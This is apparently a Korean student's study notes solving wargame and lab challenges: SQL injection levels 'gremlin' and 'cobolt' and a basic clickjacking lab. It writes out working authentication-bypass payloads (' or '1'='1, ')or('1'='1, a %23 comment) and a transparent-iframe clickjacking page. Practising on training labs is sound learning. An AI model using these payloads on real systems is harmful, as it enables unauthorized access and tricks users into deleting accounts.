gremlin
id에는 아무거나 넣어주고 pw를 닫아주고 or '1'='1'을 통해 sql문을 작성해주었다.
여기서 주의해야할게 따옴표이다.
id=aaa&pw=111로한다면
sql query에는 select id from prob_fremiln where id='aa' and pw='111'로 들어갈 것이다.
따라서 or '1'='1'을 삽입해줄 때
111'(한번닫아주고!!!!pw='111' 여기까지 작성한것이다.)or '1'='1(여기서 따옴표는 안적어준다. 왜냐면 닫히는 따옴표가 남아있기 때문)
cobolt
이번에 pw가 md5로 암호화되는 듯 하다.
처음에는 ?id=admin&pw=')or('1'='1
이렇게 작성해주었는데
admin이 아니라 rubiya라고 한다.
에에.. 루비야 누구세요
그래서 id=''이렇게 비워두고 쿼리를 작성해봤는데
이렇게 나왔다.
그래서 pw를 아예 주석처리를 해주려고 '#을 해줬는데
쿼리문에 들어가지 않았다.
url encoding으로 #을 검색해보니까 %23이라고 해서
써주었더니 성공했다.
SQL 기본
Basic clickjacking
wiener:peter로 로그인을 먼저 해보면
비밀번호를 변경하라고 나온다.
사용자가 계정을 삭제하도록 속여야하므로, exploit server로 가준다.
우선 사용자가 모르고 click을 해서 계정을 삭제해야되니까 iframe 태그를 사용하되, delete자리에 click을 위치하게 하여 click을 누르면 계정이 삭제되게 만든다.
<style>
#iFrA {
width: 1000px;
height: 700px;
opacity: 0.0000001;
position: relative;
z-index: 2;
}
#click {
position: absolute;
top: 510px;
left: 60px;
z-index: 1;
}'
</style>
<div id="click">Click Me</div>
<iframe id="iFrA" src=""></iframe>이렇게 작성하면 된다.
iframe의 가로와 세로를 적당하게 맞춰주고, opacity(투명도)를 0.000001로 아주 작게 설정하여 투명하게 만들어준다. 이때, opacity가 0이면 아예 투명, 1이면 투명도가 0으로 설정된다.
z-index를 2로 설정한 이유는 좀 있다 내가 넣을 Click보다 위에 표시되길 원하기 때문이다.
Click을 넣기 위해 div를 설정해준다.
이것들을 style 태그로 감싸주고 선택자를 사용해주면 된다.
